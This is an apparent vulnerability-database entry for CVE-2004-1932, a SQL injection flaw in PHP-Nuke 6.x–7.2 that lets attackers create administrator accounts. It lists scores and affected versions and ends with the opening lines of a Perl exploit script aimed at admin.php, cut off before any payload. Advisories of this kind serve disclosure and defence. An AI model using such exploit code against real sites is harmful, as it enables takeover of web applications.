7.5
CVSSv2

CVE-2004-1932

Published: 12/04/2004 Updated: 11/07/2017
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

SQL injection vulnerability in (1) auth.php and (2) admin.php in PHP-Nuke 6.x up to and including 7.2 allows remote malicious users to execute arbitrary SQL code and create an administrator account via base64-encoded SQL in the admin parameter.

Vulnerable Product Search on Vulmon Subscribe to Product

francisco burzi php-nuke 6.0

francisco burzi php-nuke 6.5

francisco burzi php-nuke 6.7

francisco burzi php-nuke 6.9

francisco burzi php-nuke 6.5_beta1

francisco burzi php-nuke 6.5_final

francisco burzi php-nuke 7.0

francisco burzi php-nuke 7.0_final

francisco burzi php-nuke 6.5_rc1

francisco burzi php-nuke 6.5_rc2

francisco burzi php-nuke 7.1

francisco burzi php-nuke 7.2

francisco burzi php-nuke 6.5_rc3

francisco burzi php-nuke 6.6

Exploits

#!/usr/bin/perl # use LWP; $log = "pos_komen_phpnuke_savemsgtxt"; $Agent = "Mbahmubangga/10"; $proxy = "1729111:80/"; # proxy:port $browser = LWP::UserAgent->new; $browser -> agent($Agent); $url = 'wwwsitewithphpnukecom/adminphp'; $browser->proxy(http => $proxy) if defined($proxy); printlog ("\nProcessin ...